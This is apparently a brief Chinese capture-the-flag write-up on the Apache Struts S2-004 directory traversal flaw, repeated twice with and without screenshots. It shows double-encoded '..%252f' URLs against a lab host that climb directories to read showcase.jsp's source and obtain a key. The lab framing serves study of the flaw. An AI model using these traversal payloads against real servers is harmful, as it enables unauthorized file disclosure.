s2-004为目录遍历漏洞,可以通过../转到上级目录
将/二次编码为%252f
访问url:http://219.153.49.228:45437/struts/..%252f
![](http://upload-images.jianshu.io/upload_images/18546298-e377a2215c02501b.png?imageMogr2/auto-orient/strip|imageView2/2/w/554/format/webp)
不断向上级跳转,直到发现showcase.jsp
![](http://upload-images.jianshu.io/upload_images/18546298-b606707cd7a58411.png?imageMogr2/auto-orient/strip|imageView2/2/w/554/format/webp)
查看源码获得key
http://219.153.49.228:45437/struts/..%252f..%252f..%252f..%252f..%252f..%252fshowcase.jsp
![](http://upload-images.jianshu.io/upload_images/18546298-baf94ca38a806efa.png?imageMogr2/auto-orient/strip|imageView2/2/w/554/format/webp)
s2-004为目录遍历漏洞,可以通过../转到上级目录
将/二次编码为%252f
访问url:http://219.153.49.228:45437/struts/..%252f
不断向上级跳转,直到发现showcase.jsp
查看源码获得key
http://219.153.49.228:45437/struts/..%252f..%252f..%252f..%252f..%252f..%252fshowcase.jsp